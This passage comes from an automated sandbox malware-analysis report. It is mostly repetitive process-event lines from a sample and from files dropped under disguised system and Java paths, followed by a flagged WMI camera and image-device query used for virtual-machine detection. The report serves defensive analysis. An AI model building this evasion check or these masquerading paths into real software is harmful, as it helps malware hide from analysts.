                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
